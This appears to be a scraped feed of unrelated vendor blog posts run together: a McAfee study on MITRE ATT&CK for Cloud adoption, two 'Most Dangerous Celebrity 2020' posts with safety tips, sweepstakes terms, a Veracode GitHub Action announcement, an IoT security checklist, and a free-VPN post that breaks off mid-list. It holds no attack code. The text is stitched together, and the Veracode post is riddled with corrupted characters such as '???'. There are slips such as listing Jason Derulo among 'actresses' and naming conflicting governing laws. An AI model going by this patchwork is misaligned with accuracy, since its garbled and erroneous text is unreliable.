The first step to developing a strong cloud security posture is visibility over the often hundreds of services your employees use, what data is within these services, and then how they are being used collaboratively with third parties and other destinations outside of your control. 

With that visibility, you can establish full control over end-user activity and data in the cloud, applying your policy at every entry and exit point to the cloud.  

That covers your risk stemming from legitimate use by employees, external collaborators, and even API-connected marketplace apps, but what about your adversaries? If someone phished your CEO, stole their OneDrive credentials and exfiltrated data, would you know? What if your CEO used the same password across multiple accounts, and the adversary had access to apps like Smartsheet, Workday, or Salesforce? Are you set up to detect this kind of multi-cloud attack? 

Our Research to Uncover the Best Solution  

Most enterprise security operations centers (SOCs) use MITRE ATT&CK to map the events they see in their environment to a common language of adversary tactics and techniques. This helps to understand gaps in protection, model how attackers progress from access to exfiltration (or encryption/destruction), and to plan out security policy decisions.  

The original ATT&CK framework applied to Windows/Mac/Linux environments, with Android/iOS included as well. For cloud environments, the MITRE ATT&CK framework has a shorter history (released October 2019), but is quickly gaining adoption as the model for cloud threat investigation 

In collaboration with the University of California Berkeley’s Center for Long-Term Cybersecurity (CLTC) and MITRE, we sought to uncover how enterprises investigate threats in the cloud, with a focus on MITRE ATT&CK. In this initiative, researchers from UC Berkeley CLTC conducted a survey of 325 enterprises in a wide range of industries, with 1K employees or above, split between the US, UK, and Australia. The Berkeley team also conducted 10 in-depth interviews with security leaders in various cybersecurity functions.  

Findings 

MITRE has done an excellent job identifying and categorizing adversary tactics and techniques used in the cloud. When asked about the prevalence of these tactics observed in their environment, 81% of our survey respondents had experienced each of the tactics in the Cloud Matrix on average. 58% had experienced the initial access phase of an attack at least monthly. 

Given the frequency in which most enterprises experience these adversary tactics and techniques, we found widespread adoption of the ATT&CK Cloud Matrix, with 97% of our respondents either planning to or already using the Matrix. 

In the full report, we explore deeper implications of using MITRE ATT&CK for Cloud, including consensus on the value it brings to enterprise organizations, challenges with implementation, and many more interesting results from our investigation. Head to the full report here to dive in.  

One of the most promising benefits of MITRE ATT&CK is the unification of events derived from endpoints, network traffic, and the cloud together into a common language. Right now, only 39% of enterprises correlate events from these three environments in their threat investigation. Further adoption of MITRE ATT&CK over time will unlock the ability to efficiently investigate attacks that span multiple environments, such as a compromised endpoint accessing cloud data and exfiltrating to an adversary destination. 

This research demonstrates promising potential for MITRE ATT&CK in the enterprise SOC, with downstream benefits for the business. 87% of our respondents stated that adoption of MITRE ATT&CK will improve cloud security in their organization, with another 79% stating that it would also make them more comfortable with cloud adoption overall. A safer transition to cloud-based collaboration and app development can accelerate businesses, a subject we’ve investigated in the past2MITRE ATT&CK can play a key role in secure cloud adoption, and defense of the enterprise overall.  

Dive into the full research report for more on these findings! 

White Paper

MITRE ATT&CK® as a Framework for Cloud Threat Investigation

81% of enterprise organizations told us they experience the adversary techniques identified in the MITRE ATT&CK for Cloud Matrix – but are they defending against them effectively?

Download Now

 

1https://www.mcafee.com/enterprise/en-us/forms/gated-form.html?docID=3804edf6-fe75-427e-a4fd-4eee7d189265&eid=LAVVPBCF  

2https://www.mcafee.com/enterprise/en-us/forms/gated-form.html?docID=75e3a9dc-793e-488a-8d8a-8dbf31aa5d62&eid=5PES9QHP 

The post MITRE ATT&CK for Cloud: Adoption and Value Study by UC Berkeley CLTC appeared first on McAfee Blogs.

Anna Kendrick Is McAfee’s Most Dangerous Celebrity 2020

Most Dangerous Celebrity

Anna Kendrick Is McAfee’s Most Dangerous Celebrity 2020

During COVID-19, people stuck inside have scoured the internet for content to consume – often searching for free entertainment (movies, TV shows, and music) to avoid any extra costs. As these habits increase, so do the potential cyberthreats associated with free internet content – making our fourteenth Most Dangerous Celebrities study more relevant than ever.

To conduct our Most Dangerous Celebrities 2020 study, McAfee researched famous individuals to reveal which celebrities generate the most “dangerous” results – meaning those whose search results bring potentially malicious content to expose fans’ personal information.

Thanks to her recent starring roles, American actress Anna Kendrick has found herself at the top of McAfee’s 2020 Most Dangerous Celebrities list.

The Top Ten Most Dangerous Celebrities

You probably know Anna Kendrick from her popular roles in films like “Twilight,” Pitch Perfect,” and “A Simple Favor.” She also recently starred in the HBO Max series “Love Life,” as well as the 2020 children’s film “Trolls World Tour.” Kendrick is joined in the top ten list by fellow actresses Blake Lively (No. 3), Julia Roberts (No. 8), and Jason Derulo (No. 10). Also included in the top ten list are American singers Mariah Carey (No. 4), Justin Timberlake (No. 5), and Taylor Swift (No. 6). Rounding out the rest of the top ten are American rapper Sean (Diddy) Combs (No. 2), Kate McKinnon (No. 9), and late-night talk show host Jimmy Kimmel (No. 7).

Most Dangerous Celebrity

Lights, Camera, Security

Many consumers don’t realize that simple internet searches of their favorite celebrities could potentially lead to malicious content, as cybercriminals often leverage these popular searches to entice fans to click on dangerous links. This year’s study emphasizes that consumers are increasingly searching for content, especially as they look for new forms of entertainment to stream amidst a global pandemic.

With a greater emphasis on streaming culture, consumers could potentially be led astray to malicious websites while looking for new shows and movies to watch. However, people must understand that torrent or pirated downloads can lead to an abundance of cyberthreats. If an unsuspecting user clicks on a malicious link while searching for their favorite celebrity film, their device could suddenly become plagued with adware or malware.

Secure Yourself From Malicious Search Results

Whether you and your family are checking out your new favorite actress in her latest film or streaming a popular singer’s new album, it’s important to ensure that your searches aren’t potentially putting your online security at risk. Follow these tips so you can be a proactive fan while safeguarding your digital life:

Be careful what you click

 Users looking for information on their favorite celebrities should be cautious and only click on links to reliable sources for downloads. The safest thing to do is to wait for official releases instead of visiting third-party websites that could contain malware.

Refrain from using illegal streaming sites

When it comes to dangerous online behavior, using illegal streaming sites could wreak havoc on your device. Many illegal streaming sites are riddled with malware or adware disguised as pirated video files. Do yourself a favor and stream the show from a reputable source.

Protect your online safety with a cybersecurity solution

 Safeguard yourself from cybercriminals with a comprehensive security solution like McAfee Total Protection. This can help protect you from malware, phishing attacks, and other threats.

Use a website reputation tool

 Use a website reputation tool such as McAfee WebAdvisor, which alerts users when they are about to visit a malicious site.

 Use parental control software

 Kids are fans of celebrities too, so ensure that limits are set for your child on their devices and use parental control software to help minimize exposure to potentially malicious or inappropriate websites.

Stay Updated

To stay updated on all things McAfee and for more resources on staying secure from home, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

 

 

The post Anna Kendrick Is McAfee’s Most Dangerous Celebrity 2020 appeared first on McAfee Blogs.

Check Out the McAfee Most Dangerous Celebrity 2020

Most Dangerous Celebrity

Attention Streamers: Check Out the McAfee Most Dangerous Celebrity 2020 List

During COVID-19, people stuck inside have scoured the internet for content to consume – often searching for free entertainment (movies, TV shows, and music) to avoid any extra costs. As these habits increase, so do the potential cyberthreats associated with free internet content – making our fourteenth Most Dangerous Celebrities study more relevant than ever.

To conduct our Most Dangerous Celebrities 2020 study, McAfee researched famous individuals to reveal which celebrities generate the most “dangerous” results – meaning those whose search results bring potentially malicious content to expose fans’ personal information.

Known for his BAFTA-winning celebrity chat show and BBC radio show, the UK’s national treasure, Graham Norton, has found himself at the top of McAfee’s 2020 Most Dangerous Celebrities list.

The Top Ten Most Dangerous Celebrities

Graham Norton is a household name thanks to his hugely popular talk show, The Graham Norton Show, which has seen him interview A-listers including Nicole Kidman, Hugh Grant and Helen Mirren. He is also known for his BBC radio show, as well as his inimitable Eurovision commentary. Not shy of celebrity friends, Norton is joined in the top ten list by fellow national treasures such as Ricky Gervais (No.2), and Idris Elba (No.7) and Mary Berry (no.10). Also included in the top ten list are British actor Tom Hardy (No.3) and Gavin and Stacey star, Ruth Jones (No.4). Rounding out the rest of the top ten are UK’s very own Mick Jagger (No.5), Aussie actress Margot Robbie (No.6) and models Kate Moss (No.8) and Bella Hadid (No.9).

 

Lights, Camera, Security

Many consumers don’t realize that simple internet searches of their favorite celebrities could potentially lead to malicious content, as cybercriminals often leverage these popular searches to entice fans to click on dangerous links. This year’s study emphasizes that consumers are increasingly searching for content, especially as they look for new forms of entertainment to stream amidst a global pandemic.

With a greater emphasis on streaming culture, consumers could potentially be led astray to malicious websites while looking for celebrity gossip and new shows or movies to watch. For example, given Graham is strongly associated with malicious search terms, indicates that online criminals are using Britain’s love for celebrity gossip and the Eurovision for personal gain. If an unsuspecting user clicks on a malicious link while searching for their favorite celebrity film, their device could suddenly become plagued with adware or malware.

Secure Yourself From Malicious Search Results

Whether you and your family are checking out your new favorite actress in her latest film or streaming a popular singer’s new album, it’s important to ensure that your searches aren’t potentially putting your online security at risk. Follow these tips so you can be a proactive fan while safeguarding your digital life:

Be careful what you click

Users looking for information on their favorite celebrities should be cautious and only click on links to reliable sources for downloads. The safest thing to do is to wait for official releases instead of visiting third-party websites that could contain malware.

Refrain from using illegal streaming sites

When it comes to dangerous online behavior, using illegal streaming sites could wreak havoc on your device. Many illegal streaming sites are riddled with malware or adware disguised as pirated video files. Do yourself a favor and stream the show from a reputable source.

Protect your online safety with a cybersecurity solution

Safeguard yourself from cybercriminals with a comprehensive security solution like McAfee Total Protection. This can help protect you from malware, phishing attacks, and other threats.

Use a website reputation tool

Use a website reputation tool such as McAfee WebAdvisor, which alerts users when they are about to visit a malicious site.

Use parental control software

Kids are fans of celebrities too, so ensure that limits are set for your child on their devices and use parental control software to help minimize exposure to potentially malicious or inappropriate websites.

Stay Updated

To stay updated on all things McAfee and for more resources on staying secure from home, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Check Out the McAfee Most Dangerous Celebrity 2020 appeared first on McAfee Blogs.

Most Dangerous Celebrity 2020 Sweepstakes

McAfee “Most Famous to Most Dangerous to Search for Online” 2020 MDC Sweepstakes

Terms and Conditions

NO PURCHASE OR PAYMENT OF ANY KIND NECESSARY TO ENTER OR WIN. A PURCHASE WILL NOT INCREASE YOUR CHANCES OF WINNING.

THIS SWEEPSTAKES IS INTENDED FOR PLAY IN THE UNITED STATES ONLY AND VOID IN FLORIDA, NEW YORK, AND RHODE ISLAND, AND WILL BE GOVERNED BY U.S. LAW.  DO NOT ENTER IF YOU ARE NOT BOTH ELIGIBLE AND LOCATED IN THE UNITED STATES, EXCLUDING FLORIDA, NEW YORK AND RHODE ISLAND, AT THE TIME OF ENTRY.

  1. Sweepstakes Period:

The McAfeeMost Famous to Most Dangerous to Search for Online” 2020 MDC Sweepstakes (the “Sweepstakes”) begins at 8:00:00 AM Pacific Daylight Time (“PDT”) on 10/6/2020 and ends at 5:00:00 PM PDT on 10/25/2020 (“Sweepstakes Period”). The Sweepstakes Administrator’s computer will be the official timekeeping device.

  1. How To Enter:

During the Sweepstakes Period, visit https://www.mcafee.com/en-us/consumer-support/2020-most-dangerous-celebrity.html (the “Website”), or the appropriate McAfee social handles listed below, and complete the following to receive the corresponding entries into the Sweepstakes:

Action # Entries Received Detail
Social Comment – Facebook or Twitter

 

 

@McAfee

https://www.facebook.com/McAfee/

 

 

 

@McAfee_Home

https://twitter.com/mcafee_home?lang=en

 

 

 

1 (per comment) Go to the website to review the instructions and terms & conditions.

 

Click through to the applicable McAfee social page(s).

 

Follow that McAfee social handle.

 

Find the social posts using the campaign hashtag (#RiskyCelebSweeps)

 

Comment only on those posts for means of entry.

 

1 comment = 1 entry into the sweepstakes for a chance to win.

 

Commenting on any of the sweepstakes specific posts (using #RiskyCelebSweeps) during the sweepstakes time frame allows for an entry for a chance to win the grand prize.

 

 

  1. Eligibility:

The Sweepstakes is open to legal residents of the United States, excluding residents of Florida, New York and Rhode Island and where otherwise prohibited by law, who are 18 years of age or older at the time of entry. Employees of McAfee, LLC, and each of their respective parents, subsidiaries, affiliates, prize suppliers, and advertising and promotional agencies, their immediate families (spouses, parents, children, and siblings and their spouses), and individuals living in the same household as such employees are ineligible.

  1. Winner Selection/Odds:

There will be one grand prize winner. The prize winner will be selected at random from the final pool of entrants (commenters) on the applicable sweepstakes social posts. Anyone who comments on any of the sweepstakes posts, within the sweepstakes time period, is included in the Prize entry pool. Limit one (1) prize per person per household. By participating, entrants acknowledge the McAfee Privacy Notice and agree to be bound by the Official Sweepstakes Rules and the decisions of the Sponsor which shall be final and binding in all respects. The odds of winning depend on the total number of eligible entries received.

  1. Winner Notification:

Prize winner will be notified the week of 10/26/20.  No winners will be announced prior to this time.  All winners will be notified by the official McAfee Facebook (https://www.facebook.com/McAfee/ ) or McAfee_Home Twitter (https://twitter.com/McAfee_Home) page. McAfee will not ask you to provide any credit card information to claim a prize. Prize winner will be required to sign an Affidavit of Eligibility and Liability/Publicity Release (where permitted by law) to be returned within (4) days of written notification, or prize may be forfeited. If a prize notification is returned as unclaimed or undeliverable to a potential winner, if potential winner cannot be reached within four (4) calendar days from the first notification attempt, or if potential winner fails to return requisite document within the specified time period, or if a potential winner is not in compliance with these Official Rules, then prize may be forfeited. Sponsor is not responsible for any change of email address, mailing address and/or telephone number of entrants.  Sponsor reserves the right to select an alternative winner should the first winner fail to claim the prize.

  1. Prize:

GRAND PRIZE – Approximate ARV = $900

  • iPad Air
  • Disney+ subscription for 1-year (includes Disney, Pixar, Marvel, Star Wars, Nat. Geo)
  • Spotify Premium for 1-year
  • $200 Visa Gift Card

Limit one (1) prize per person per household. Prizes are non-transferable and no cash equivalent or substitution of prize is offered. Subscriptions are subject to the terms and conditions available at https://www.mcafee.com/en-us/consumer-support/2020-most-dangerous-celebrity.html. If a prize, or any portion thereof, cannot be awarded for any reason, Sponsor reserves the right to substitute prize with another prize of equal or greater value. Prize winner will be solely responsible for all federal, state and/or local taxes, and for any other fees or costs associated with the prizes they receive, regardless of whether it, in whole or in part, are used. Since the prize value exceeds $600, the prize winner will be issued a W-9 form to fill out and return prior to receiving their prize. The sweepstakes Sponsor must mail a copy of the 1099-MISC form postmarked by January 31st of the year following the year in which the winner won the prize.

  1. Internet/Limitations Of Liability:

Sponsor and others are not responsible for interrupted or unavailable network server or other connections; for miscommunications; failed telephone or computer transmissions; for jumbled, scrambled or misdirected entries or transmissions; for phone, electrical, network, computer hardware or software or program malfunctions, failures or difficulties; for other errors, omissions, interruptions, or deletions of any kind, whether human, typographical, mechanical or electronic; or for any damage to any person’s computer related to participating in the Sweepstakes. Sponsor and others are not responsible for illegible, unintelligible, late, lost, stolen on entries not received; for incorrect or inaccurate entry information, whether caused by Website users or by any of the equipment or programming associated with or utilized in the Sweepstakes; or for any typographical, technical or human errors which may occur in the processing of any entries in this Sweepstakes. Persons found tampering with or abusing any aspect of this Sweepstakes as solely determined by Sponsor will be disqualified and may be subject to prosecution. Any person attempting to enter using multiple email addresses, multiple identities, any bot, robotic or any other device or artifice to enter multiple times with different identities or email addresses or to interfere with the proper play of this Sweepstakes or to be otherwise behaving in an unsportsmanlike manner as determined by Sponsor will be disqualified from participation in the Sweepstakes. If in the judgment of Sponsor, the Sweepstakes is compromised by virus, bugs, non-authorized human intervention or other causes beyond the control of Sponsor, which corrupts the administration, security, fairness or proper play of the Sweepstakes, Sponsor reserves the right, in its sole discretion, to modify, discontinue, suspend or terminate the Sweepstakes and randomly award the prizes from among all eligible, non-suspect entries received prior to any such modification, discontinuation, suspension or termination. Should multiple users of the same email account enter the Sweepstakes and a dispute thereafter arise regarding the identity of the entrant, the authorized account holder of said email account at the time of entry will be considered the entrant.  “Authorized account holder” is defined as the natural person who is assigned an email address by an Internet access provider, online service provider or other organization which is responsible for assigning email addresses or the domain associated with the submitted email address. In the event of a dispute as to the identity of an entrant based on his/her Facebook or Twitter account, the authorized Facebook or Twitter account holder submitted at time of entry will be deemed the entrant. Please see the privacy notice located at http://www.mcafee.com/us/about/privacy.html or details of Sponsor’s policies regarding the use of personal information collected in connection with this Sweepstakes. If you are selected as a winner, your information may also be included in a publicly-available winners list.

CAUTION: ANY ATTEMPT TO DELIBERATELY DAMAGE ANY WEBSITE OR UNDERMINE THE LEGITIMATE OPERATION OF THE SWEEPSTAKES IS A VIOLATION OF CRIMINAL AND CIVIL LAWS. SHOULD SUCH AN ATTEMPT BE MADE, THE SPONSORS RESERVE THE RIGHT TO SEEK DAMAGES OR OTHER REMEDIES (INCLUDING WITHOUT LIMITATION ATTORNEYS’ FEES) FROM ANY SUCH PERSON(S) RESPONSIBLE FOR THE ATTEMPT TO THE FULLEST EXTENT PERMITTED BY LAW.

  1. Release:

By participating in the Sweepstakes, each entrant releases and agrees to indemnify and hold harmless Sponsor, Prize Providers and others from and against any and all costs, claims, damages, (including, without limitation, any special, incidental or consequential damages), or any other injury, whether due to negligence or otherwise, to person(s) or property (including, without limitation, death or violation of any personal rights, such as violation of right of publicity/privacy, libel, or slander), due in whole or in part, directly or indirectly, to participation in the Sweepstakes, or arising out of participation in any Sweepstakes-related activity, or the receipt, enjoyment, participation in, use or misuse, of any prize.

 

  1. Publicity Rights:

By accepting a prize, the winner agrees to allow Sponsor and Sponsor’s designees the perpetual right to use his/her name, biographical information, photos or likeness, and statements for promotion, trade, commercial, advertising and publicity purposes, at any time or times, in all media now known or hereafter discovered, worldwide, including but not limited to on the Internet, without notice, review or approval and without additional compensation except where prohibited by law.  Any collection of personal information from entrants will be governed by the McAfee Privacy Policy.

 

  1.  Disputes:

EACH ENTRANT AGREES THAT ANY DISPUTES, CLAIMS, AND CAUSES OF ACTION ARISING OUT OF OR CONNECTED WITH THIS CONTEST OR ANY PRIZE AWARDED WILL BE RESOLVED INDIVIDUALLY, WITHOUT RESORT TO ANY FORM OF CLASS ACTION, AND EXCLUSIVELY BY THE UNITED STATES DISTRICT COURT FOR THE DISTRICT OF DELAWARE OR THE APPROPRIATE STATE COURT LOCATED IN DOVER OR WILMINGTON, DELAWARE. THESE OFFICIAL RULES ARE GOVERNED BY THE LAWS OF THE STATE OF DELAWARE WITHOUT REGARD TO CHOICE OF LAW OR CONFLICT OF LAWS RULES.  YOU WAIVE ANY AND ALL OBJECTIONS TO JURISDICTION AND VENUE IN THESE COURTS AND HEREBY SUBMIT TO THE JURISDICTION OF THOSE COURTS.

 

  1. Limitations of Liability:

TO THE FULLEST EXTENT PERMITTED BY APPLICABLE LAW, IN NO EVENT WILL THE SPONSOR OR THE RELEASED PARTIES BE LIABLE FOR ANY SPECIAL, INDIRECT, INCIDENTAL, OR CONSEQUENTIAL DAMAGES, INCLUDING LOSS OF USE, LOSS OF PROFITS OR LOSS OF DATA, WHETHER IN AN ACTION IN CONTRACT, TORT (INCLUDING NEGLIGENCE) OR OTHERWISE, ARISING OUT OF OR IN ANY WAY CONNECTED TO YOUR PARTICIPATION IN THE CONTEST OR USE OR INABILITY TO USE ANY EQUIPMENT PROVIDED FOR USE IN THE CONTEST OR ANY PRIZE, EVEN IF A RELEASED PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES.

 

TO THE FULLEST EXTENT PERMITTED BY APPLICABLE LAW, IN NO EVENT WILL THE AGGREGATE LIABILITY OF THE RELEASED PARTIES (JOINTLY) ARISING OUT OF OR RELATING TO YOUR PARTICIPATION IN THE CONTEST OR USE OF OR INABILITY TO USE ANY EQUIPMENT PROVIDED FOR USE IN THE CONTEST OR ANY PRIZE EXCEED $10.  THE LIMITATIONS SET FORTH IN THIS SECTION WILL NOT EXCLUDE OR LIMIT LIABILITY FOR PERSONAL INJURY OR PROPERTY DAMAGE CAUSED BY PRODUCTS RENTED FROM THE SPONSOR, OR FOR THE RELEASED PARTIES’ GROSS NEGLIGENCE, INTENTIONAL MISCONDUCT, OR FOR FRAUD.

  1. The Sweepstakes and the Official Rules are governed by US law and are subject to all applicable federal, state and local laws and regulations. All issues and questions concerning the construction, validity, interpretation and enforceability of the Official Rules, or the rights and obligations of Entrant and Sponsor in connection with the Sweepstakes, shall be governed by, and construed in accordance with, the laws of the State of New York, U.S.A., without giving effect to the conflict of laws rules thereof, and any matters or proceedings which are not subject to arbitration as set forth above, in these Official Rules and/or for entering any judgment on an arbitration award, shall take place in the State of New York.

 

Winner’s List:  For a list of winners, mail a self-addressed, stamped envelope to: “Most Famous to Most Dangerous to Search for Online” to 100 Crown Street, New Haven, CT 06510. Requests must be received by 11/30/20.

 

Sponsors: McAfee Corporate Headquarters, 2821 Mission College Blvd., Santa Clara, CA 95054

 

Administrator: Response Marketing, 100 Crown Street 3rd Floor, New Haven, CT 06510

 

The post Most Dangerous Celebrity 2020 Sweepstakes appeared first on McAfee Blogs.

Veracode Makes DevSecOps a Seamless Experience With GitHub Code Scanning

Developers face a bevy of roadblocks in their race to meet tight deadlines, which means they often pull from risky open source libraries and prioritize security flaws on the fly. In a recent ESG survey report, Modern Application Development Security, we saw that 54% of organizations push vulnerable code just to meet critical deadlines, and while they plan for remediation on a later release, lingering flaws only add to risky security debt. With speed a critical factor in what makes or breaks the success of your application deployments, that means the health of your code ??? and your security ??? is on the line.

GitHub Actions are an intuitive way to solve the need for speed without sacrificing quality, helping your developers stay on schedule by enabling them to build, test, and deploy code directly from GitHub. And with over 50 million developers on GitHub, plus more than 200,000 automated fixes merged into GitHub repositories since May of 2019, it???s clear that GitHub is a hotspot for developers. When paired with the right application security (AppSec) scan types and SaaS-based approaches, this integration makes GitHub Actions an invaluable part of your development team???s workflow.

That???s why we???re excited to announce our new GitHub Action to help streamline your AppSec workflow for the developers on your team. The action is directly embedded within the native GitHub code scanning user interface, ensuring your DevSecOps practices are seamless, efficient, and effective. By making Veracode???s AppSec tools accessible in a familiar interface like GitHub, developers on your team can jump right into secure coding with critical testing and analysis that won???t halt projects or slow production down.

The Veracode solution to enhanced workflows

Developers can perform Veracode???s Static Policy Scan or Pipeline Scan and see the results of that scan within the GitHub Security tab. The ability to invoke Veracode???s Static Analysis (SAST) scans from within their own GitHub projects significantly expands the testing capability for developers leveraging GitHub workflows, and allows them to build security into their DevOps processes to scale development across their team.

That???s less downtime and fewer bottlenecks for faster innovation. With such a high frequency of commits flowing through GitHub (more than 2,000 direct contributors made commit contributions to TensorFlow alone in 2019), Veracode???s multi-scan and SaaS-based solutions mean that our customers have a leg-up when it comes to harnessing GitHub Actions for speed and efficiency.ツ?ツ?

This functionality comes as part of GitHub code scanning launch, with our GitHub Action available in the GitHub Marketplace. ???Veracode is a leader in application security and truly understands the importance of shifting left in the development lifecycle to enable teams to find and fix flaws at scale,??? says John Leon, VP of Business Development at GitHub. ???With software development moving at breakneck speed, this new GitHub Action further enables our joint customers to develop secure software, without compromising speed or quality ??? all within a familiar interface.???

My Code, Our Code, Production Code???

Veracode???s Static Analysis solution was a natural addition to GitHub???s new code scanning feature as it enables DevSecOps with fast, automated, and actionable security feedback. This feedback is delivered directly to developers in their pipeline through each critical My Code, Our Code, and Production Code stage.

Working within the GitHub environment, your developers have the control they need. Scan results are converted into GitHub code scanning alerts and developers receive clear remediation advice to keep their projects moving forward with fewer delays. Once code is at the deployment stage, the Veracode Policy Scan provides a robust assessment of your application code ??? and an audit trail for compliance to prove security efforts.

Veracode scan results (from more than 15 trillion lines of code to date) are highly accurate as a result of the intelligence of our SaaS platform, meaning there???s no need for manual tuning when you need to adjust course. Ready to scale your DevSecOps initiatives for efficiency? Visit the GitHub Marketplace to get started.ツ?

Cybersecurity Awareness Month: If You Connect It, Protect It

#BeCyberSmart

Cybersecurity Awareness Month: If You Connect It, Protect It

October is Cybersecurity Awareness Month, which is led by the U.S. government’s Cybersecurity and Infrastructure Security Agency (CISA) in conjunction with the National Cyber Security Alliance (NCSA)—a national non-profit focused on cybersecurity education & awareness. McAfee is pleased to announce that we’re a proud participant.

We live in a day and age when even lightbulbs can be hacked.

Perhaps you’ve caught the stories in the news: various devices like home cameras, smart appliances, and other Internet of Things (IoT) devices falling prey to hackers and attacks, such as when the Mirai botnet took out large swathes of the internet in 2016. As posted by Statista, estimates project that the world will have nearly 40 billion IoT devices in the next five years and upwards of 50 billion by 2030. That’s in homes and businesses alike, ranging anywhere from digital assistants, smart watches, medical devices, thermostats, vehicle fleet management devices, smart locks, and yes, even the humble lightbulb—and like our computers, laptops, smartphones, and tablets, they all need to be protected.

The reason is simple: your network is only as safe as the weakest device that’s on it. And we’re putting so much more on our networks than ever before. In effect, that means our homes have more targets for hackers than ever before as well. In the hands of a dedicated crook, one poorly protected device can open the door to your entire network—much like a thief stealing a bike by prying open the weak link in a chain lock. Therefore, so goes the saying, “If You Connect It, Protect It.”

The Eight-Point List for Protecting Your IoT Devices

What’s challenging is that our IoT devices don’t always lend themselves to the same sort of protections like our computers, laptops, and phones do. For example, you can’t actually install security software directly on them. However, there are things you can do to protect those devices, and the network they’re on too.

1) Do your IoT homework

Just because that new smart device that’s caught your eye can connect to the internet doesn’t mean that it’s secure. Before you purchase, read up on reviews and comments from other customers. Look for news articles about the device manufacturer too. The fact of the matter is that some IoT device manufacturers are much better at baking security protocols into their devices than others, so look into their track record to see if you can uncover any issues with their products or security practices. Information such as this can help you make an even more informed choice.

2) Don’t use the default—Set a strong, unique password

One issue with many IoT devices is that they often come with a default username and password. This could mean that your device, and thousands of others just like it, all share the same credentials, which makes it painfully easy for a hacker to gain access to them as those default usernames and passwords are often published online.

When you purchase an IoT device, set a fresh password using a strong method of password creation.  And keep those passwords safe. Instead of keeping them on a notebook or on sticky notes, consider using a password manager. It acts as a database for all your passwords and stores new codes as you create them. As always, don’t store them in an unprotected file on your computer, which can be subject to a hack or data loss.

3) Use two-factor authentication

Our banks, many of the online shopping sites we use, and numerous other accounts use two-factor authentication to make sure that we’re logging in we really are who we say we are. In short, a username and password combo is an example of one-factor authentication. The second factor in the mix is something you, and only you, own, like your mobile phone. Thus when you log in and get a prompt to enter a security code that’s sent to your mobile phone, you’re taking advantage of two-factor authentication. If your IoT device supports two-factor authentication as part of the login procedure, put it to use and get that extra layer of security.

4) Secure your internet router

Your router acts as the internet’s gateway into your home. From there, it works as a hub that connects all of your devices—computers, tablets, and phones, along with your IoT devices as well. That means it’s vital to keep your router secure. A quick word about routers: you typically access them via a browser window and a specific address that’s usually printed somewhere on your router. If you’re renting your router or you’ve purchased it through your internet provider, they should have help documentation that can guide you through this the process. Likewise, if you purchased your own, your manual should provide the guidance you need.

As we mentioned above, the first thing to do is change the default password and name of your router if you haven’t done so already. Again, use a strong method of password creation. Also, change the name of your router. When you choose a new one, go with name that doesn’t give away your address or identity. Something unique and even fun like “Pizza Lovers” or “The Internet Warehouse” are options that mask your identity and are memorable for you too. While you’re making that change, you can also check that your router is using an encryption method, like WPA2, which will keep your signal secure. If you’re unsure, reach out to your internet provider or check the documentation that came with your router.

5) Set up a guest network specifically for your IoT devices

Just as you can offer your guests secure access that’s separate from your own devices, creating an additional network on your router allows you to keep your computers and smartphones separate from IoT devices. This way, if an IoT device is compromised, a hacker will still have difficulty accessing your other devices, like computers and smartphones, along with the data and info that you have stored on them. You may also want to consider investing in an advanced internet router that has built-in protection and can secure and monitor any device that connects to your network.

6) Use a VPN and a comprehensive security solution

Another line of defense that can hamper hackers is using a VPN, which allows you to send and receive data while encrypting your information so others can’t read it. When your data traffic is scrambled that way, it’s shielded from prying eyes, which helps protect your network and the devices you have connected to it.

7) Update!

As with our computers, laptops, phones, tablets, and apps, make sure you have the latest software updates for your IoT devices. The reasons here are the same: one, they’ll make sure you’re getting the latest functionality from your device; and two, updates often contain security upgrades. If there’s a setting that lets you receive automatic updates, enable it so that you always have the latest.

8) Protect your phone

You’ve probably seen that you can control a lot of your connected things with your smartphone. We’re using them to set the temperature, turn our lights on and off, and even see who’s at the front door. With that, it seems like we can add the label “universal remote control” our smartphones—so protecting our phones has become yet more important. Whether you’re an Android owner or iOS owner, get security software installed on your phone so you can protect all the things it accesses and controls—in addition to you and the phone as well.

And protect your other things too

And of course, let’s not forget our computers and laptops. While we’ve been primarily talking about IoT devices here, it’s a good reminder that computers and laptops need protection too. Using a strong suite of security software like McAfee® Total Protection, can help defend your entire family from the latest threats and malware, make it safer to browse, and look out for your privacy too.

If you connect it, protect it

We’re connecting our homes and ourselves with IoT devices at an tremendous rate—now at an average of 10 connected devices in our homes in the U.S. Gone by are the days when all we had was a computer or phone or two to look after. Now, even when we’re not in front of a laptop or have a smartphone in our hand, we’re still online, nearly all the time. Take this week to make sure that what you’ve connected is protected. Even that little lightbulb.

Stay Updated 

To stay updated on all things McAfee and for more resources on staying secure from home, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Cybersecurity Awareness Month: If You Connect It, Protect It appeared first on McAfee Blogs.

5 Reasons Why You Should Avoid Free VPNs

Virtual Private Network (VPN) is a technology that offers total security for all your digital activities. It serves as a barrier against third-party groups, hackers, cyber threats, malware, and sensitive data leakage. 

More than ever, we need to invest with high-end protection to ensure our privacy is never compromised. VPNs are of high demand due to the current condition where most people stay at home and work remotely. With increased online activity, it’s high time to protect your privacy. 

Free VPNs are enticing and offer ‘great’ security without extra cost. Their services are too-good-to-be-true, which you need to doubt and stay away from it. 

Are There Alternatives To Top-Rated VPN Providers? 

The threat of using free VPN is high as it does not offer robust encryption compared to paid services. It is better to pay for a cheap VPN service than to compromise your security. Affordable VPN services offer powerful data encryptions for people with limited budgets. They provide standard encryption technology to ensure your privacy is protected and your digital activities are secured. 

There are a few reliable and trusted VPN solutions that offer affordable VPN instead of using free services that threaten your security. These are great alternatives that won’t hurt your wallet but will surely be of great help, especially if you’re a constant internet explorer. 

5 Facts Why Free VPNs Are A No-No

Free VPN software keeps records of your digital activities and sells them to third parties. They offer encryptions that don’t ‘really’ mask your activities nor protect your identity. Free VPN services log all your sensitive data which is already a threat to your privacy. Aside from that, here are five things you need to remember: Free VPNs are a no-no. 

  1. Monitor And Sell All Collected Data

VPNs act as your protective barrier against digital threats while you’re online. It secures all your data, online activities, and private information against prying eyes, government surveillance, etc. VPNs blocked hackers and your ISP from collecting or selling data to gain profit. 

Free VPN shifts the message, and you become their milking cow to fund the service they offer in exchange for the data they collected from you. These sensitive data are then sold to third parties, and prose threats not just to your information, but your privacy is at stake. 

  1. Leaks IP Addresses

Robust VPN solutions offer total security and encryption on all your digital activities and traffic. It serves as your secret portal in the world wide web against cyber threats, hackers, and prying eyes. 

